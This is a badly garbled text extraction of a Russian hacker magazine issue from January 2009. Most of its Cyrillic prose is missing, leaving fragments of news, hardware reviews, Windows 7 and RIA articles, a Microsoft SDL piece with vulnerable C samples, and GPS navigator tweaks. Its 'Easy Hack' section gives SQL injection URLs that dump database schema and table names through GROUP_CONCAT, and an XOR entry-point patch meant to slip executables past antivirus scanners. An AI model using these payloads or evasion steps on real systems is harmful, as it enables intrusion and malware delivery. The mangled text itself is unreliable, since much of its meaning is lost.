Хакер 2009 01 PDF

WINDOWS
. 128
x 01()2009
2009
w w w.xakep.ru
01 (121) 2009
WindoWs 7/
. 96
. 20
121
PHP-
. 62
-

GPS-
. 36
WEB-
. 26
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 1
10.
, . -,
: 10 , -. ,
, ,
, ,
.
:).
P.S. X-party
.
.
nikitozz, . . X
udalite.livejournal.com
Content01(121)
004
MeGAnewS

092
-
CURL BUILDER C++
ferruM
016
096
102
wIndOwS, 7:
104
-
026
rIA-

\++
pc_ZOne
020
, ,
-
108
-
032
Sdl, MIcrOSOft
Syn/AcK

SECURITY DEVELOPMENT LIFECYCLE
036
112

GPS-

WAIK: WINDOWS
118

WIN2K8 WSUS 3.0 SP1
040
eASy hAcK
122
128

044
qIp

132
-
052
136
139
140
-tOOlS

072
078
x-Stuff

082
086

UBUNTU 8.10 KUBUNTU 8.10:

091
tIpS'n'trIcKS

142

070
8,5
PHP-
066
fAq unIted
FAQ
3D-
062
pSychO:

056
lIvecd:
LINUX

048
x-puZZle

144
www2
WEB-
032
048
092
128
>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>
Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
UNIXOID, XAKEP.PRO PSYCHO
Andrushock
(andrushock@real.xakep.ru)
Dr. Klouniz
(alexander@real.xakep.ru)
Dlinyj
(dlinyj@real.xakep.ru)
>

(lyashchenko@gameland.ru)
/dvd
>
Step
(step@real.xakep.ru)
> unix-
Ant
>

(komarov@gameland.ru)
>

/Art
>-

(novikov.e@gameland.ru)
>

(svetlyh@gameland.ru)
>

/xakep.ru
>

(xa@real.xakep.ru)
>

(goryacheva@gameland.ru )
>

(olgaeml@gameland.ru)

(alekhina@gameland.ru)
(belov@gameland.ru)
>

(maksimova@gameland.ru)
>

(Strekneva@gameland.ru)
/publishing
>

(noah@gameland.ru)
>

>

(dmitri@gameland.ru)
>

(shostak@gameland.ru)
>

(romanovski@gameland.ru)
>

(stepanovm@gameland.ru)
>

(leonova@gameland.ru)
>

(ladyzhenskiy@gameland.ru)
>pr-

(litvinovskaya@gameland.ru)
>

(andrey@gameland.ru)
>

(kosheleva@gameland.ru )
>

(goncharova@gameland.ru)
.: (495) 935.70.34
: (495) 780.88.24
>
.: 8 (800) 200.3.999

>
101000, ,
, / 652,

,

77-11802 14 2002 .

ScanWeb, .
100 000 .
.

.
:

. ,

,
.

.

.

.
>> meganews
Meganews
Mifrill
/ mifrill@real.xakep.ru /

Nokia ,
, , .
Nseries . N97
3.5" QWERTY-
. WiFi, Bluetooth, GPS, 5
Carl Zeiss, 32 16 (-
ASUS Eee PC
microSD-). -,
Flash-, , .
Nokia A-GPS
N97 , ,
(
).
2009 , 550 .
60% .

, ,

.
,
.
CD- DVD-. ,

. ,
,
.
. ,
,
100 ,

. ,
, , , ,
.
004
x 01 /121/ 09
>> meganews

Creative Commons.
100.000
Windows,

, . ,
, .
,
Microsoft Windows XP Microsoft Office
XP. , , , , ,
, . ,
: 117
. ,
. ,
, ,
, .
IE .

.
1.91%
, -
. 2009
1 .
, ,
.
,
, .
, ,
.
, ,
. , . ,
:).

,
, .
. TN Games, , , HTX Helmet,
. , FPS.
2009 ,
. , TN Games, ,
, , $200, .
006
x 01 /121/ 09
>> meganews
9 AOL ICQ- 5.1.
. , ,
- , . , , . ;-)
. ,
, :-), ;), :)
.
. , ,
Nestle , ,
. (,
) . -,
; -, , ,

, ,
. ,
- ,
.
, , .
2009 .
,
-
. ,
, ,
Windows. ,
-
250.000
. , , ,
. , ,
, , Microsoft

.
. ,
,
.
,
, . , ,
, , .
008
, , . .
, ,
, , Lingvo X3 ME, ABBYY
. ME Medved Edition,

. , IT-,
-
.

,
490 .
,

, ABBYY
,

.
x 01 /121/ 09
>> meganews
Windows
:
89.62%.
90%
,
.
(
), . ,

.
www.biletam.net .
,
(
),
. ,
! ,
. ,
27 . , .
, , ,
, ,

, .
-
?
,
,
,
. . Facebook
,
. Facebook

(Adam Guerbuez) .
, ,
. ,
$873 . Facebook 2008 $300 .
, Facebook 4
. -,
, ,
.
, ,
. Facebook ,
, .

Palm,
, ,
-
. , ,
;
, .

. , Palm Apple , ,
010
Palm
Nova. , Palm
Palm OS 5. Nova
, 2009
.
BlackBerry
iPhone, 2%
. ,
, App Store.
, .
, !
x 01 /121/ 09
>> meganews
1234567.
123456.
?
, Yahoo! ,
Microsoft.
, . Microsoft
$47.5 ., Yahoo! .
2008 Microsoft
, . ,
Yahoo! ( , 2008
), Yahoo! . , ,
, . ,
$20 . ,
Microsoft
AOL
Fox Interactive Media , , ,
. Microsoft .

, ,
,
. 1250
( ) 1
2008,
, .
:
. ,
,
, , .
, ,
,
.
,
. , ,
YouTube -,
, ,
,
.
512 SDD

, 10

,
. Toshiba
SSD- 64,
128, 256 512 . , 512
, 1.8".
2.5". MLC-, Toshiba 240 \
200 \ . ,
AES-.

, ,
2009.
012
x 01 /121/ 09
>> meganews

, EBay.

, , . , , ,
- . ,
, 0000.
,
.
, , . EBay ,
, , , .

Microsoft
, , .
. - Windows
7 , ,

. Device
Stage, Jump Lists.
Windows Advanced Rasterization Platform (WARP),
DirectX 10 10.1
.
Windows Live,
. Windows 7
,
Vista, 2010. -, , 2009. ,
.
, Vista - Service Pack 2.
, Vista
SP1. SP2
2009 . - , , ,
.
x 01 /121/ 09
013
>> meganews

,

, .
2008 $82 .
-
.
,
10.000. , ,
- (,
)
,
. ,
,
.
.
, - , . ,
Telstra,
,
. ,
. , ,
.
. ,
.
Google,
Google Chrome, . ,
, . Gmail - ( , )
: Gmail .
Chrome , -,
Opera. , , Opera , Chrome 0.71% 0.83%. ,
,
014
Firefox 3 Chrome. , ,
Gmail. IE , , . ,
7 , 7 (, Google
). , ,
: Internet Explorer, IE8,
-
: Firefox 3 Chrome. Chrome
Google Earth. !
x 01 /121/ 09
>> meganews
.

, , ,
, .

, , , .
,
, ? ,
,
Grippity. , QWERTY- . ,
() . ,
, . , Grippity , ,
, .
.
$100,
.
.
, , Abit
. Abit ,
2004 . -
. , -
,

Universal Scientific Industrial (USI). USI Abit
, ,
. Abit ,
, , . ,
. 1 2009 Abit .
x 12 /120/ 08
015
>> ferrum
! ,
- .
. .

, , . , ,
- -.
Skype
,
ICQ, Mail- yahoo-messenger. ,
, .
128
/. ,
. , 640480
.
, ,
. ,
,
. , smotri.com ,
.
, web. , .
016

.

.
. , ,
, . Skype ,
, .

Skype. , 10 /.
!
, .
Windows XP Professional SP3 .
.
, .
(
- -). ,
,
.
x 01 /121/ 09
>> ferrum
Creative Live!
Cam Notebook Ultra
:
: 1,3
:1280 x 1024
: 5 ( )
: 30 /
: USB 2.0
ST BUY
TORs
EDI
TO
s CHOICE
ST BUY
EDI
ICE
HO
BE
BEST BUY
BE
750 .
2300 .
Genius iSlim 321R

:
: 0,3
: 640 x 480
: 0,3 ( )
: 30 /
: USB 2.0
Creative, ,
. . , ,
.
: , ,
. -
- .

.
.
.
.

. :
, USB
.
( ).
. ,
.
x 01 /121/ 09
Genius
, - .
-
. .
(
).
,
. , ,
, . ,
. , .
,
, .
.
,
, . : ,
.
017
>> ferrum
Hercules Deluxe Optical Glass Hercules Dualpix Chat and Show
: 1,3
: 800 x 600
: 1,3 ( )
: 30 /
: USB 2.0
: 1,3
: 1280 x 1024
: 5 ( )
: 30 /
: USB 2.0
1400 .
2200 .

. , , , ,
. (
-) ,
, . , ,
.
.
. ,
- (
).
. , , ,
, .
.
.
018
. , , ,
- . .
- 2 .
,
USB. .
, , , , .
, -.
.
. ,
. ,
: , .

, , , . , ,
.
: , ,
.
x 01 /121/ 09
>> ferrum
ICE
EDI
TORs
s CHOICE
EDI
TO
R
HO
2300 .
4600 .
Logitech QuickCam Sphere AF

:
: 2
: 1600 x 1200
: 8 ( )
: 30 /
: USB 2.0
Microsoft LifeCam VX :
: 0,3
: 640 x 480
: 1,3 ( )
: 30 /
: USB 2.0
Logitech.
,
. -, Carl Zeiss
. -,
. -,

, . -,

.
, 26 . .
, ,
, ,
.
. ,

.
Microsoft .
: ,
(Russian edition?).
. ,
. ,
: .
, 0,3 .
, :
. :
,
.
,
. . : , , , .
: , (
640480).
,
100% . , web-, .
. Logitech
QuickCam Sphere AF. ,
.
, ( ), Creative
Live! Cam Notebook Ultra . Microsoft LifeCam
VX-5500 , .
! z
x 01 /121/ 09
019
>> pc_zone
sPider_Net
/ antonov.igor.khv@gmail.com /
WindoWs,
7:
Vista, Microsoft

Windows 7. !
2010 , preBeta- !
: blAcKcOMb
, Windows 7 Microsoft. , Windows XP
Vista . Windows 7
. ,
020
, , . Windows 7
Microsoft!
2000 . , , Microsoft
BlackComb
2005 , 2001
x 01 /121/ 09
>> pc_zone
Windows 7
, BlackComb
Windows LongHorn,
Vista. Blackcomb
Vienna. , , Windows 7
, !
, Microsoft
. ,
,
.
; , Vista. , . PreBeta- build 6801. Microsoft
PDC, -.
6933, 6801, .

x 01 /121/ 09
, , . .
6956, ,
. ,
,
.
UAC,
, , .

. Microsoft, ,
, - . ,
(, slow_work=on?),
: Windows 7 ! !
WordPad
021
>> pc_zone
(Super Bar)
TC
TC
info
Vista

.

, .

,
.

,

,

.

( Libraries),

.

.

,
.
,

.
ISE
UAC
.
Pentium
4 (
Vista 40-45
).
. Aero ,
,

. , .
(Visual Studio 2008, Delphi 2009 ..),
,

. : ,
?.
,
, Vista.
,
30 . :
Windows 7? !
, PreBeta,
.
:
Vista . ,
2-3 . ,
. ,
Asus eeeP .
. , . Windows 7 SuperBar
.
, ,
.

.
Windows Media Player

,

.

.
022
x 01 /121/ 09
>> pc_zone
Windows 7
,
Windows 7, . :
, , ,
, . ?
Windows 7
,
.
( ,
,
50% ;
) AeroSnap (www.aerosnap.de.vu).
, Winsplit Revolution (www.
winsplit-revolution.com).
UAC, , Vista .
, ,
Nortons User Account Control
(www.nortonlabs.com/inthelab/uac.php).
, , , , .
Life Rocks blog ,
, , wallpaper,
. : www.nirmaltv.
com/2008/11/07/transform-vista-to-windows-7.
Aero Peek,
, . ,
Visual
Task Tips (www.visualtasktips.com),
Taskix (taskix.robustit.com).
.
: ?
. ,
,
Windows.
.
.
Vista, ,
.
, ,
.
,
, ,
( ).
: -
.
Windows ,
. -:
Word
. , Microsoft SideBar, . ,
, -
.
x 01 /121/ 09

,
Microsoft : MS Paint, ,
WordPad .. Windows 95.
2010 Microsoft
. , MS Paint
ribbon; -
PNG.
WordPad , ,
MS Paint, . , -,
,
.
, Windows
Media Player. ,
, ,
:).
-
-, Microsoft
, *nix-.
, ,
023
>>
.
bat , CScript . 2006
MS PowerShell
, .NET Framework.
MS.
Windows 7 - .

6801 ,
Vista.
, . . , , . ,
:
1. ( ) Rafael.
2. Windows.
3.
:
> takeown /f %windir%\explorer.exe
> cacls %windir%\explorer.exe /E /G <>:F
> start unlockProtectedFeatures.exe
4. .
024

Windows . , Windows
Solution Center. , , .
UAC, , , . ,
.
Vista
User Account
Control, .
( API-, ,
), . Windows 7, , UAC
. , UAC
,
. ,
UAC ,
.
Outro by Step

, -,
- , , , ...
.
Vista . ,
Daemon Tools,
. . ,
,
. ,
:)
P.S. 14 . . z
x 01 /121/ 09
>> pc_zone

/ aleks.raiden@gmail.com /
RIA-
-
-
. - ,
. AJAX!
?
- RIA ()
- ,
: , .
,

( , ). ,
-
( ). ,
,
. ActiveX Microsoft Java-,
, ,
, . Flash ,
,
,
API,
. : - - , ,
, .
026
, ,
. ,
- (,
, , ) Google Chrome
,

. ,
,
.
, Mozilla Prism, Mozilla Firefox (,
).
, Safari . -,
, .

Flash-. Adobe AIR, Adobe (z, #111).
x 01 /121/ 09
>> pc_zone
dvd

RIA!
links
Silverlight 2
:
http://silverlight.net/
GetStarted/overview.
aspx.
BrowserPlus Yahoo -,
? ,
RIA-. RIA
Rich Internet Application ,
,
(
) . , ,
,
,
, HTML. RIA
, -
Doom !
x 01 /121/ 09

.
, ,
, ,
, ,
, . ,
-,
! :
: www.
silverlighter.ru, www.
silverlight.ru.
Unix
: www.
go-mono.com/
moonlight.

! - MS
Expression Studio 2
Microsoft:
expression.microsoft.
com.
027
>> pc_zone
info
Titanium (www.
titaniumapp.com)
,

- HTML/
CSS/JavaScript

, ,
- .

.
warning
Google
Gears Yahoo
BrowserPlus
,
Flash,
Silverlight JavaFX

.
Silverlight Microsoft
RIA- ! , ?
Google Gears Google

: gears.google.com
: Firefox, Internet Explorer
Safari, Android Windows Mobile
:
Google Docs docs.google.com
Google Reader reader.google.com
RememberTheMilk www.rememberthemilk.com
Zoho Writer zoho.com
- Wordpress
Google Chrome
Gears ,

AJAX-.
- . ,
Google Gears -
Flex
RIA
,

.
028
x 01 /121/ 09
>> pc_zone
Gears !
Google Gears

, AJAX- Gears ( , ). ,
Gears : ,
. ,
Google Gears: Dojo Toolkit jQuery ( jquery-offline,
http://code.google.com/p/jquery-offline); ExtJS
,
, .

, . ,
Google Docs, WiFi-, 20. ,
Gears. ,
, Google. , Gears,
, , Google Docs,
Wordpress. 2.6, -
Gears - .
,
. MySpace
,
( , Gears
, , ).
: Google Gears
? . API,
.
(-, SQL- , ), API , -, JavaScript-
. , , :
- ,
- . Google Gears
, , . , /
x 01 /121/ 09
( kernal32.dll, -),
!
URL
-
.
:
Google Gears . ,
gears.google.com .
Google Chrome ,
. -, Google Gears
Adobe Flash, .
Yahoo! Browser Plus Yahoo

: browserplus.yahoo.com
: Firefox, IE 6/7,Safari, Chrome,
Mac PC
: Yahoo!, Flickr
Yahoo! Browser Plus , - ( JavaScript).
Google Gears,
, : !. Gears,
BrowserPlus
. :
, drag-n-drop,
-,
.
ImageMagic ,
Photoshop Express Adobe
MS Paint. ,
Ruby,
, (
Gears, , ,
) Text-to-Speech (,
, ). :
, , . ,
, : ,
- .
Microsoft Silverlight/Moonlight
: microsoft.com/silverlight/
: Firefox, IE 6/7, Safari, Mac, PC
029
>> pc_zone
Silverlight , ImageCup
Linux/Unix
:
Microsoft
NBA
iStreamPlanet
- sky.com
Flash- ,
Microsoft, , ( , , )
.NET Framework,
-. MS
Silverlight, , Mono,
Linux/Unix Moonlight,
. , ,
Gears BrowserPLus. Silverlight ,
.NET. ( HD-, DRM-,
- - VC-1, WMV, WMA, MP3),
( C#,
.NET-),
XML , .
DHTML JavaScript, ,
,
Silverlight -, ,
. API
XMLHTTPRequest,
AJAX-: ,

(, AJAX- server-push Comet
). , . Silverlight
,
- JavaScript API, ,
.NET. ,
Microsoft
, -,
Silverlight 2, ! , ,
030
Quake

Native Client (http://code.google.com/p/nativeclient)
Google,
x86 ! ,

, !
Linux
! , Quake . , ,
:
1. Native Client (http://code.google.com/p/
nativeclient);
2. Google Chrome Firefox http://projects.
cocaman.net/quake/quake.html.
Windows, Mac,
Linux.
Adobe Flash/Flex
: http://www.adobe.com/products
: Firefox, IE 6/7, Safari, Mac, PC
Linux/Unix
:
Adobe
www.orbismap.com
eBay
Google Analytics
Flex- http://wiki.flash-ripper.com/
?title=_Flex-
Flash , , .
, RIA- Adobe Flex. Flash, x 01 /121/ 09
>> pc_zone
. , !
Sun, Java JavaFX.

RIA-,
FxScript.
JRE (, Silverlight
Flash), , -,
, . , Java
,
JavaFX. , , Sun
java-...
: http://www.javafx.com/about/overview
,
, MXML,
,
GUI-. , Flash Adobe
. 10
-. , Silverlight,
,
-, HD,
Adobe Pixel Blender!
. , , Flash . , FarCry Crysis
, Quake/Doom ! Adobe Alchemy
-. , ,
, ++.
++
x 01 /121/ 09
( ,
,
, ). C++ , ,
3D-, ,
,
3D DirectX OpenGL!
,
( , http://alternativaplatform.
com/ru), ,
. Doom ?
www.newgrounds.com/portal/view/470460.
?
.
- (, ) .
JavaScript, ,
, -. ,
, !.
, , .NET Microsoft.
- Silverlight
Adobe Flash/Flex/Alchemy,
, (C# .NET
Framework Silverlight 2, ++ Alchemy)
. ,
JavaScript ,
.
, IDE ( , ,
- ?).
,
RIA- , ,
, , , , .
: -,
, ? , , ? :)z
031
>> pc_zone

,
1999 ,

.

,
Windows,

.
SDL,

Microsoft
Security Development Lifecycle

2003 , 1.500.000 ,
3.370.000 ,
RPCSS.
, ,
Senior Development Lead Microsoft.
Microsoft
BlackHat, ,
. .
Microsoft , , . :
50000 , Microsoft,
. !
,
,
. ,
, SDL Security Development Lifecycle.
SDL
.
, SDL -
032
SEC(R)2008,
. .
SDL
. , , best practices ,
,
. : ,
, , . SDL ,
: , , , , ,
, . , SDL
- ,
. ,
( ).
, , .
, , ,
x 01 /121/ 09
>> pc_zone

, , , Blaster,
:
WCHAR wszMachineName[N+1] {

WCHAR wszMachineName[N + 1];

LPSTR pwszServerName = wszMachineName;

while (*pwszPath != L\\)

*pwszServerName++ = *pwszPath++;
}
pwszPath,
wszMachineName.
FxCop managed-
, !
, , , SDL
: Microsoft .
.
:
, !
.
Microsoft Security Response Center,
. , , , - ,
, , RPC, ,
SDL, .
- ,
( ) , , . , ,
. , , (), ,
,
. ,
SDL .
?
: SDL
? ,
, :). SDL Optimization Model,

, , ,
SDL . ,
SDL (
), , , .
C/++ /GS (
), /SAFESEH
(/SafeSEH) SDL.
. Best Pratices
/NXCompat,
(DEP) (/NXCompat).
,
PREfast, FxCop, Application Verifier.
PREfast Visual Studio ( 2005) /analyze. ,

_alloca, :
char *b;
do {

b = (char*)_alloca(9)
} while(1)
- ,
Visual Studio, FxCop
SDL
x 01 /121/ 09
033
>> pc_zone
SDL Threat Modeling Tool
info
Microsoft

SDL (,

3.2, MS
4.0).
SDL

,

.
dvd
DVD
.
034
,
.NET
Framework ( , ).
, .
Application Verifier unmanaged-.
,
. AppVerif
,
, .
,
API, .
Visual Studio. IDE ,
, , strcpy. :
void func(char *p) {
char d[20];
strcpy(d,p);
// etc
}
*p ,
.
strcpy ,

( ). Visual C++
stdafx.h
:
#define _CRT_SECURE_CPP_OVERLOAD_STANDARD_
NAMES 1
,
:
void func(char *p) {
char d[20];
strcpy_s(d,__countof(d), p);
// etc
}
,
SDL.
.
, . SDL
, , , .

. ,
Microsoft SDL,
, SDL.
,

.
, ,
.
,

x 01 /121/ 09
>> pc_zone
Visual Studio 2005, PREfast

Visual Studio /Analyse
. SDL Threat Modeling Tool
Microsoft, , ,
Visio.
, ? ! ,
(),
,
.
.
.
,
. , , , .
, :
1. ?
:
.
2. ?
3. ?
!

,
,
.
,
. SDL Threat Modeling Tool
, ,
. , .
MS , ,
, , .
, . ,
,
: API .
, , , (
).
. -,
. , , -
- . , Word
doc-, JPEG.
JPEG , , , , , .
-, .
,
Word : doc, . . x 01 /121/ 09
SDL
, SDL , , ,
.
SDL,
, , .
Microsoft
Microsoft Source Code Analyzer for SQL Injection XSS Detect Beta.
Visual Studio
XSS- -.
XSS ,
: RATSRough Auditing Tool for
Security (http://www.fortify.com/security-resources/rats.jsp)
ProxMon (http://www.fortify.com/security-resources/rats.jsp).

:
Microsoft Anti-Cross Site Scripting Library V1.5 for .NET applications
AntiXSS for Java (http://www.gdssecurity.co)
:
SiteLock ActiveX . Best Practices,
;
Banned.h -,
,
SDL.
, , . ,
, ,
, Man-in-the-middle .
:
1. (dumb) .

.
2. (smart) .
, , JPEG -
- . , , .
, .
? .
,
NDA. :
, Microsoft,
Peach ( , http://peachfuzzer.com).
, peach pits (
) ,
. :
, RPC, COM/DCOM, SQL- .
:
FileFuzz, Fuzzing Software (http://www.
fuzzing.org/fuzzing-software);
File Fuzzers, Fuzzbox, Windows IPC Fuzzing Tools, Forensic Fuzzing
Tools iSEC Partners (www.isecpartners.co).
SDL?
! , .
: -
! z
035
>> pc_zone

GPS-
GPS-. , : , - .
. -
, !
GPS-
Windows Mobile. .
,
GPS-!
,
,
, , .
POI, (, , , ,
.., ..). ,
.
, ,
036
,
, , .
, . ,
, .
, , GPS-
, .
, . , ,
-
, .
, ,
. , GPS- , - . ,
x 01 /121/ 09
>> pc_zone
navitel.ru
, .

, ,
.
3.2
iGO 8
3.2
autosputnik.com
2007,
.
Tele Atlas,
. OnLine
POI ( ,
, , ..)
.
iGO
i-go.com/ru
,
.
,
, .
TomTom
www.tomtom.com
TomTom , .
. embedded-, ,
.
TomTom Navigator
,
. ,
GPS ,
, !
Embedded-
( , , , ),
? , , ,
: GPS-,
. :
.
,
. ,
. .
user-friendly ,
.
, , ,
- ( ). ! Windows,
x 01 /121/ 09
Garmin Mobile XT
www.garmin.ru
Nokia, Windows,
WinCE. , .
, , . ,
? .

GPS, Voxtel ,
( ) Voxtel Carrera X433. , GPS-, .
, . ,
037
>> pc_zone
WinCE
-
, , ,
.
.
Visual Studio. Visual Studio ( Express) Windows CE/ Windows
Mobile
, , .
Platform Builder. ,
, , .
,
- . SDK, Platform Builder.
(SuperH, x86, MIPS,
ARM).
Embedded Visual C++ (eVC). Visual C++
embedded- Windows CE.
GPS-
System Information
links

100%

gpspassion.
com,
gps-club.ru 4pda.ru.
info

.

512 ( ),
fat16
.

,
,

off on. . ,
.
,
, 10-15.
,
, ,
.
038
Garmin Mobile XT
, -
,
Windows CE (WinCE). Windows ,

.
,
,
. ,
Windows CE
32 ,
.
Mio Menu
GWES-
5 .

, - Windows,

: , - , ..
( ), GPS- www.gps-club.
.
ru 4pda.ru,

Embedded-,
, .
PND-.
, ( , SD-
PND PNA ),
shell.ini :

GPS-\windows\explorer.exe
, BT-,
//.
card-,
,
ActiveSync Microsoft
(
, , ). ,
(, USB
x 01 /121/ 09
>> pc_zone
GPS-: WindowsCE
).
explorer.exe (
). !
, -.
, ,
, .
Audio, Music, Video Navitel,
.
3.2, , , .
Navitel.exe , -
GPS-. ? , ,
, , iGo
Igo.exe Navitel.exe. (
)!
exe- -.
navitel.exe
explorer.exe. ,
,
. , ,
, ceDesktop.exe,
.
Navitel.exe, ,
:).
, ,
Windows CE 5.0.
, ( Windows
Explorer), ,
(\DataStorage\CentralAP.exe), CONF.ini. .
, , iGo
GPS, :
GPSPath= \User\Navitel\Navitel.exe
, ,
iGO8 :). ,

( ) ,
,
. , x 01 /121/ 09
,
Windows CE, , , , ,
,
. ,
:
1. PNA;
2. ,
( , ..);
3.
Mobilenavigator, exe- mobilenavigator.exe;
4. .
Voxtel Carrera
,
.
TotalComander
WinCE.
? !

? , ,
Visual Studio ( ). , ,
,
.
Voxtel,
, .
, .
, . !
MioPocket 2.0 (http://www.gpspassion.com/forumsen/topic.
asp?TOPIC_ID=109690)
Mio,
. ,
.
,
, , ,
MS Office, ,
.. ,
. :
( )
System Infomation (http://
gpstacho.bettersoft.de).
, , , . :
,
? , : , .
,
Registry Workshop.
! z
039
>>
Easy Hack}
R0id Cr@wler
/ r0id@mail.ru /
Dot.err
/ crawlerhack@rambler.ru / / kaifoflife@bk.ru /
:
sql- MySQL
:
, SQL- - . , ,
- .
, LIMIT, ,
, .
, , .
GROUP_CONCAT() MySQL => 4.1 .
(
concat(), ). , GROUP_CONCAT()
, - . ,
1
(aka 1024 ),
group_concat_max_len. , , . , GROUP_CONCAT():
1. .
2. , DISTINCT,
ORDER BY, ASC/DESC.
3. LIMIT.
4. 1024
( ).
GROUP_CONCAT() MySQL =>
5 .
1. , sql- :
http://www.hacked.com/index.php?id=-1
: , , ,
:
,
. , , : PE- ,
(
), .
040
GROUP_CONCAT()
2. ( , <= 1024 )
:
http://www.hacked.com/index.php?id=1+UNION+SELECT+GROUP_CONCAT(SCHEMA_NAME SEPARATOR
0?0a)+FROM+information_schema.SCHEMATA/*
3. ( ,
<= 1024 ) :
http://www.hacked.com/index.php?id=1+UNION+SELECT+GROUP_CONCAT(TABLE_NAME SEPARATOR
0?0a)+FROM+information_schema.TABLES/*
, , Raz0r: http://raz0r.name/obzory/
group_concat.
:).
:
[ ] > [ (
)] > [ JMP,
] > [
PUSH 0
]
. , , (00401000) PUSH 0. 6A 00.
x 01 /121/ 09
>>
,
00401026. :
jmp 00401026, ( ) EB 24. ,
,
EB 24 6A 00. XOR ( ,
, ).
EB24 6A00, XOR
X: EB24 XOR X = 6A00. X : X = 6A00 XOR EB24, X = 8124.
, ; XOR 2481.
, :
1. OllyDBG PUSH 0,
00401000, jmp 00401026,
EB24.
2. 00401026, , :
00401026 MOV EAX, 00401000

; EAX

0040102B MOV EBX, [EAX]
; EBX
0040102D XOR EBX,2481
; XOR
jmp 00401026 PUSH 0
00401033 MOV [EAX],EBX; ...
00401035 JMP 00401000 ; ...
3.
. !
. ,
: , , , ,
.
3
:
:

.
www.virustotal.com.
,

, www.virustotal.com
( , 1wmz ). :). . :
1. ///etc :
PHP5 cURL, set_time_limit();
.htaccess;
- (/etc);
2. ( ,
ChaaK) ;
3. 777 ./files;
4. index.php, :
